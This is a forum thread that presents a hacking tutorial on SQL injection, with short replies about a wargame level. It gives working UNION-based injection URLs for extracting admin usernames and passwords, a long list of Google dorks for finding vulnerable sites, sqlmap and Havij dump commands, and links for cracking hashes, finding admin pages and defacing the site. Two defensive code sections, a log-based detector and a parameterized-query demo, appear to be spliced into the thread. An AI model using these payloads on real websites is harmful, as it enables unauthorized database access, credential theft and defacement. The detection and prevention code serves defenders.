SQL injection with all ways
I need some help to make this article better :)
SQL injection
What is SQL injection?
SQL injection is a way to ‘attack’ a website. Usually, using a website's PHP command to the database, the attacker exploits this vulnerability ‘hole’ to get into the SQL database. When the attackers get into their database, they are usually looking for the admin username and password, or they want to take usernames and passwords from the game.
Well action time
There are a lot of ways to SQL inject a website database..
First way… The way without any tool
1. You have to find the count of columns.
ex:
www.site.com/index.php?id=79 order by 1--
www.site.com/index.php?id=79 order by 2--
www.site.com/index.php?id=79 order by 3--
etc….
When you find an error you stop.
(if you don’t find any error then the URL is not vulnerable)
like
[ Unknown column ‘9’ ]
then you need to put a vulnerable column.
www.site.com/index.php?id=-79+union all select 1,2,3,4,5,6,7,8--
now you need to find the current database
www.site.com/index.php?id=-79+union all select 1,2,3,group_concat(schema_name),5,6,7,8 from information_schema.schemata--
www.site.com/index.php?id=-79+union all select 1,2,3,database(),5,6,7,8 from information_schema.schemata--
get columns:
www.site.com/index.php?id=-79+union all select 1,2,3,group_concat(column_name),5,6,7,8 from information_schema.columns where table_schema=database()--
get admin username and pass:
www.site.com/index.php?id=-79 union all select 1,2,3,group_concat(login,0x3a,pass,0x3a),5,6,7,8 from column_name--
now you have the username of admin and password
if the password is hashed go here
md5.rednoize.com
now u need to find the admin login page
try /admin /admin.php /admin.html /adminlogin.php if u don’t find anything try this:
if you have the python make a new text file paste this code http://pastebin.com/Y0UKitPP and save it as .py
If you don’t have the python here is a simple admin login finder :http://adf.ly/Ec2m2 and a admin dorks list : http://adf.ly/Ec24t
Still don’t find anything?
Try with a website file scanner like this one : website file scanner
Or any other, and search their website's files for any admin login.
When u find the adminlogin login as a admin , go to file manager and make a javascript code that looks like u r a pro hacker.. or get a ready one here is the link for the matrix:
http://www.dynamicdrive.com/dynamicindex10/matrixeffect.htm
this is the first way..
The second way and the simple that every one can do it is that with the windows programs…
There are a lot of sqli programs..
I am gonna use havij here is the link: havij
First of all you need to find a vulnerability scanner… I am gonna use this :http://sec4app.com/ cuz it give us keyword type and post holes too
Or use the google dorks..
here are some:
allinurl:index.php?id=
allinurl:trainers.php?id=
allinurl:buy.php?category=
allinurl:article.php?ID=
allinurl:play_old.php?id=
allinurl:newsitem.php?num=
allinurl:readnews.php?id=
allinurl:top10.php?cat=
allinurl:historialeer.php?num=
allinurl:reagir.php?num=
allinurl:Stray-Questions-View.php?num=
allinurl:forum_bds.php?num=
allinurl:game.php?id=
allinurl:view_product.php?id=
allinurl:newsone.php?id=
allinurl:sw_comment.php?id=
allinurl:news.php?id=
allinurl:avd_start.php?avd=
allinurl:event.php?id=
allinurl:product-item.php?id=
allinurl:sql.php?id=
allinurl:news_view.php?id=
allinurl:select_biblio.php?id=
allinurl:humor.php?id=
allinurl:aboutbook.php?id=
allinurl:ogl_inet.php?ogl_id=
allinurl:fiche_spectacle.php?id=
allinurl:communique_detail.php?id=
allinurl:sem.php3?id=
allinurl:kategorie.php4?id=
allinurl:news.php?id=
allinurl:index.php?id=
allinurl:faq2.php?id=
allinurl:show_an.php?id=
allinurl:preview.php?id=
allinurl:loadpsb.php?id=
allinurl:opinions.php?id=
allinurl:spr.php?id=
allinurl:pages.php?id=
allinurl:announce.php?id=
allinurl:clanek.php4?id=
allinurl:participant.php?id=
allinurl:download.php?id=
allinurl:main.php?id=
allinurl:review.php?id=
allinurl:chappies.php?id=
allinurl:read.php?id=
allinurl:prod_detail.php?id=
allinurl:viewphoto.php?id=
allinurl:article.php?id=
allinurl:person.php?id=
allinurl:productinfo.php?id=
allinurl:showimg.php?id=
allinurl:view.php?id=
allinurl:website.php?id=
allinurl:hosting_info.php?id=
allinurl:gallery.php?id=
allinurl:rub.php?idr=
allinurl:view_faq.php?id=
allinurl:artikelinfo.php?id=
allinurl:detail.php?ID=
allinurl:index.php?=
allinurl:profile_view.php?id=
allinurl:category.php?id=
allinurl:publications.php?id=
allinurl:fellows.php?id=
allinurl:downloads_info.php?id=
allinurl:prod_info.php?id=
allinurl:shop.php?do=part&id=
allinurl:productinfo.php?id=
allinurl:collectionitem.php?id=
allinurl:band_info.php?id=
allinurl:product.php?id=
allinurl:releases.php?id=
allinurl:ray.php?id=
allinurl:produit.php?id=
allinurl:pop.php?id=
allinurl:shopping.php?id=
allinurl:productdetail.php?id=
allinurl:post.php?id=
allinurl:viewshowdetail.php?id=
allinurl:clubpage.php?id=
allinurl:memberInfo.php?id=
allinurl:section.php?id=
allinurl:theme.php?id=
allinurl:page.php?id=
allinurl:shredder-categories.php?id=
allinurl:tradeCategory.php?id=
allinurl:product_ranges_view.php?ID=
allinurl:shop_category.php?id=
allinurl:transcript.php?id=
allinurl:channel_id=
allinurl:item_id=
allinurl:newsid=
allinurl:trainers.php?id=
allinurl:news-full.php?id=
allinurl:news_display.php?getid=
allinurl:index2.php?option=
allinurl:viewapp.php?id=
allinurl:viewphoto.php?id=
allinurl:rub.php?idr=
allinurl:galeri_info.php?l=
allinurl:review.php?id=
allinurl:iniziativa.php?in=
allinurl:curriculum.php?id=
allinurl:labels.php?id=
allinurl:story.php?id=
allinurl:look.php?ID=
You scan the website for vulnerability holes… When u find one, see what kind of type it is (string, integer), what the keyword is, the method (havijget,post), and if it has the database type it is gonna be perfect.
Then put it in havij and click Analyze…
Wait..
Selected Column Count is 8
Finding string column
Valid String Column is 4
Target Vulnerable :D
Now you need to go tables tick the database and click get tables..
Then you go to the admin table
You click get columns and then click on the admin
Then you tick the username and password and get data
When you get the password, if it is hashed, havij has its own tool..
Then you know what to do to find the adminlogin and make a nice ‘hack message’.
That was the second way
The third way is the commands way..
For the third way you will need VirtualBox : https://www.virtualbox.org/wiki/Downloads
And backtrack 5 : http://www.backtrack-linux.org/downloads
Here is a random video on how to install backtrack 5 on your pc..
When you install backtrack 5 open sqlmap
Here is the commands :
First you need to find a vulnerability hole. like: http://www.site.com/index.php?id=22222
./sqlmap -u http://www.site.com/index.php?id=22222
The command to get databases:
./sqlmap -u http://www.site.com/index.php?id=22222 --dbs
Now you need to find tables, here is the command:
./sqlmap -u http://www.site.com/index.php?id=22222 --tables -D database name
The command to find columns:
./sqlmap -u [url] --columns -T Table-Name -D database name
Now “dump” a column
./sqlmap.py -u http://www.site.com/index.php?id=22222 -D database name -T table name -C column name --dump
And you get The username and pass :)
Websites vulnerability list: http://pastebin.com/spCX8PqG
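How the three methods in the post above look from the server side, as an added example that is not part of the original thread: a Python scan of web access log lines for the column-count sweep, the UNION/information_schema requests and sqlmap's default User-Agent. The log lines and rule names are constructed for illustration, and the Apache/nginx combined log format is assumed.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

RULES = {
    "order_by_probe": re.compile(r"\border\s+by\s+(\d+)", re.I),
    "union_select": re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I),
    "schema_enum": re.compile(r"\binformation_schema\b", re.I),
    "group_concat": re.compile(r"\bgroup_concat\s*\(", re.I),
}
SQLMAP_UA = re.compile(r"\bsqlmap/", re.I)  # sqlmap's default User-Agent prefix
# Combined format: ip - - [time] "METHOD target PROTO" status size "referer" "ua"
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<target>\S+) [^"]*" '
    r'\d{3} \S+ "[^"]*" "(?P<ua>[^"]*)"')

def scan(lines, sweep_threshold=3):
    """Return {client_ip: sorted rule names that fired for that client}."""
    hits, order_by_seen = defaultdict(set), defaultdict(set)
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue
        ip = m["ip"]
        query = unquote_plus(m["target"].partition("?")[2])  # decode %20 and '+'
        for name, rx in RULES.items():
            if found := rx.search(query):
                hits[ip].add(name)
                if name == "order_by_probe":
                    order_by_seen[ip].add(int(found.group(1)))
        if SQLMAP_UA.search(m["ua"]):
            hits[ip].add("sqlmap_user_agent")
    for ip, indexes in order_by_seen.items():  # many distinct indexes = column counting
        if len(indexes) >= sweep_threshold:
            hits[ip].add("column_count_sweep")
    return {ip: sorted(names) for ip, names in hits.items()}

# Constructed sample log (documentation IP ranges), not real traffic.
def _line(ip, target, ua="Mozilla/5.0"):
    return f'{ip} - - [01/Jan/2024:10:00:00 +0000] "GET {target} HTTP/1.1" 200 512 "-" "{ua}"'
SAMPLE_LOG = [
    _line("203.0.113.7", "/index.php?id=79"),
    _line("203.0.113.9", "/index.php?id=79+order+by+1--"),
    _line("203.0.113.9", "/index.php?id=79%20order%20by%202--"),
    _line("203.0.113.9", "/index.php?id=79+order+by+9--"),
    _line("203.0.113.9", "/index.php?id=-79+union+all+select+1,2,3,"
          "group_concat(schema_name),5,6,7,8+from+information_schema.schemata--"),
    _line("198.51.100.4", "/index.php?id=22222", ua="sqlmap/1.7 (https://sqlmap.org)"),
]
```

The User-Agent rule only catches a tool left on its defaults, so the query-string rules are the ones to rely on.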
Unfair Website….!!!!
Need help with math homework? Hit me up! I can help out with integral calculus and below.
If you make people think they’re thinking, they’ll love you. but if you really make them think, they’ll hate you.
~ Harlan Ellison
So when you test vulnerability, and you get this message:
```
Message: mysql_fetch_assoc() expects parameter 1 to be resource, boolean given
Filename: libraries/Functions.php(659) : eval()'d code
Line Number: 17
A PHP Error was encountered
Severity: Warning
Message: mysql_free_result() expects parameter 1 to be resource, boolean given
Filename: libraries/Functions.php(659) : eval()'d code
Line Number: 29
```
What is this telling you?
Need help with math homework? Hit me up! I can help out with integral calculus and below.
- daMage
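Warnings like the ones quoted above are what PHP prints when `mysql_query()` returned `false` because the query failed and the result was passed on unchecked. The following is an added example, not code from this thread: it uses Python's sqlite3 instead of the thread's PHP/MySQL, with a constructed `news`/`admin` schema and hypothetical function names, to show how a pasted-in `id` changes the query and how a bound parameter prevents it.

```python
import sqlite3

def make_db():
    """Constructed in-memory schema standing in for the site's database."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE news (id INTEGER, title TEXT, body TEXT);
        CREATE TABLE admin (login TEXT, pass TEXT);
        INSERT INTO news VALUES (79, 'Hello', 'First post');
        INSERT INTO admin VALUES ('root', 'constructed-hash');
    """)
    return db

def fetch_vulnerable(db, raw_id):
    # The request value is pasted into the SQL text, so the database parses it as SQL.
    sql = "SELECT id, title, body FROM news WHERE id = " + raw_id
    try:
        return db.execute(sql).fetchall()
    except sqlite3.Error as exc:
        # PHP's mysql_query() signals this case by returning false.
        return "query failed: " + str(exc)

def fetch_parameterized(db, raw_id):
    # The value is bound as data; the SQL text is fixed before the value is seen.
    sql = "SELECT id, title, body FROM news WHERE id = ?"
    return db.execute(sql, (raw_id,)).fetchall()

def fetch_validated(db, raw_id):
    # Second layer: an id must be a plain integer, otherwise nothing is queried.
    if not (raw_id.isascii() and raw_id.isdigit()):
        return []
    return fetch_parameterized(db, int(raw_id))

# Inputs shaped like the ones in the thread, adapted to the 3-column sample table.
PROBES = ["79", "79 ORDER BY 3", "79 ORDER BY 4",
          "-79 UNION ALL SELECT 1, login, pass FROM admin"]

def compare():
    """Map each probe to (vulnerable result, parameterized result)."""
    db = make_db()
    return {p: (fetch_vulnerable(db, p), fetch_parameterized(db, p)) for p in PROBES}
```

With the bound parameter every probe except the plain `79` returns no rows and raises no error, so the page gives no signal about the column count.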
Hmm, I think the sqli lvl 2 is much easier to solve on linux kernel than a windows machine !!!
- @IAmDevil
It’s good to be back! :D
I don’t think so, I am using Windows Vista and solved it just fine with chrome. I think all the difference is in the browser and if you know how to do sql injections in the url.
haha, excellent point! Knowing how to use tools is not the same as knowing how ;)
Yup, so much agree with that.
@IAmDevil :
I don’t know whether it is like you said. I think to solve sqli level 2 you just need a powerful browser such as ff and some basic knowledge about sql. What’s linux’s advantage on sqli lvl 2 compared to other OSes? I think hacking depends more on who is behind the computer :D
“People who don’t work hard don’t have the right to be envious of the people with talent. People fail because they don’t understand the hard work necessary to be successful.”